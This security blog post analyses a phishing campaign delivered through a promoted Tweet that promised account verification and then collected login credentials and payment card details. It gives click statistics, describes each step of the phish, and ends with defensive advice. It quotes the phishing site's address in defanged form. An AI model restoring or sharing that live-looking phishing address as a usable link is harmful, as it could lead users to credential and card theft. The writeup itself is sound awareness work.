There’s been a bit of an issue with promoted Tweets on Twitter in the last few days – well, one specific promoted Tweet at any rate – in the form of a rogue phish asking for login credentials and payment information.
What is a Promoted Tweet?
All well and good. However:
The promoted Tweet on display shows what appears to be a “Verified Accounts” feed, alongside the message
The link did indeed lead to a phish, and we decided to take a look around. First, the stats:
Over 3 days, the Tweet was clicked by 812 people, with 97.4% of those hitting the link via Twitter’s t.co redirect (in other words, directly from the sponsored Tweet). 644 visitors arrived via iPhone, with 534 hits coming from the US.
The phish itself (still live at time of writing) is located at
mobile-authentication(dot)000webhostapp(dot)com/welcome(dot)html
It focuses on the well worn phish approach that is “Come and get yourself a nice blue tick on your profile”:
The second step of the phish asks for username, email address, company name, phone number and password, alongside some other bits and pieces such as whether or not the victim uses Twitter Ads and how many followers they have:
The final step in the phish asks for card number, expiry date, security code, name, billing address, and contact email:
One of the things people tend to look out for when avoiding phishing scams is checking if the site is secure, on the basis that most phish pages are typically non SSL. It’s always worth stressing that this aspect taken on its own, with no other potential phishy red flags considered, is NOT a magic bullet as there are some phish scams out there which are indeed touting a padlock.
Sure enough, the phishing page actually is secure…
…for the first two pages, at least.
At the point where the site is asking for payment information, our browser flags the page as containing content which is not secure, which may help to steer at least a few victims away from disaster. Things aren’t going to plan for Twitter right now, and the last thing the service needs is a bunch of phishing links served up via sponsored Tweets.
Whether links you see on Twitter are served up by friends, strangers, or even sponsored content placed there via Twitter itself, never take them for granted – the moment you see a site asking for login credentials and / or payment information, think very carefully about your next move. “Trust, but verify” has never seemed quite so relevant…
Christopher Boyd (hat tip to Izzy Galvez)